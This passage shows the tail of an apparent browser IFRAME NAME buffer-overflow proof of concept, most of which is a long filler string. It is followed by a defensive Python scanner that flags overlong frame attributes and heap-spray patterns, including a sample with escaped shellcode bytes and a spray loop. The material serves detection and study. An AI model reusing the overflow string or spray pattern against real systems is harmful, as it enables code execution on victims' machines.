CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"></IFRAME>

</HTML>
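A defender-side check for the two things this post describes, the 0x0D0D0D0D heap spray in the helper script and the overlong NAME value on the <IFRAME>: this is an added example in Python, not part of the post or of SkyLined's attachment. It parses an HTML page with the standard library, flags FRAME/IFRAME NAME and SRC values above an assumed length threshold, and runs a few heuristics over each <SCRIPT> body (a long %u-escaped unescape() blob, a string that doubles itself in a loop, a loop that stores the same payload into many array slots); the sample page and both thresholds are constructed placeholders.

```python
import re
from html.parser import HTMLParser
# Constructed sample shaped like the post's attachment (not the PoC itself): an
# escaped blob, a self-doubling sled loop, a spray loop and an overlong NAME.
SCRIPT_PART = """<HTML><SCRIPT language="javascript">
shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178");
bigblock = unescape("%u0D0D%u0D0D");
while (bigblock.length<slackspace) bigblock+=bigblock;
for (i=0;i<700;i++) memory[i] = block + shellcode;
</SCRIPT>
"""
SAMPLE = SCRIPT_PART + '<IFRAME SRC="file://' + "B" * 300 + '" NAME="' + "C" * 2200 + '"></IFRAME></HTML>'

MAX_ATTR_LEN = 1024    # assumed limit for a FRAME/IFRAME NAME or SRC value
MIN_ESCAPED_WORDS = 8  # assumed: this many %uXXXX words inside unescape() looks like shellcode
def heap_spray_indicators(script):
    """Return the spray heuristics matched by one <SCRIPT> body (empty list if none)."""
    hits = []
    blobs = re.findall(r'unescape\("((?:%u[0-9a-fA-F]{4})+)"\)', script)
    if any(b.count("%u") >= MIN_ESCAPED_WORDS for b in blobs):
        hits.append("long_unescape_blob")
    if re.search(r'while\s*\(.*\)\s*(\w+)\s*\+=\s*\1\b', script):  # x += x: a sled doubling itself
        hits.append("self_doubling_block")
    if re.search(r'for\s*\(.*\)\s*\w+\[\w+\]\s*=', script):  # the same payload stored many times
        hits.append("array_fill_loop")
    return hits

class FrameScanner(HTMLParser):
    # Flags oversized NAME/SRC on FRAME/IFRAME; hands each <SCRIPT> body to the heuristics.
    def __init__(self):
        super().__init__()
        self.findings, self._in_script, self._script = [], False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag in ("frame", "iframe"):
            for name, value in attrs:
                if name in ("name", "src") and value and len(value) > MAX_ATTR_LEN:
                    self.findings.append(f"{tag}:{name}:len={len(value)}")
    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            self.findings.extend(heap_spray_indicators("".join(self._script)))
            self._script = []

def scan(html):
    scanner = FrameScanner()
    scanner.feed(html)
    return scanner.findings
```

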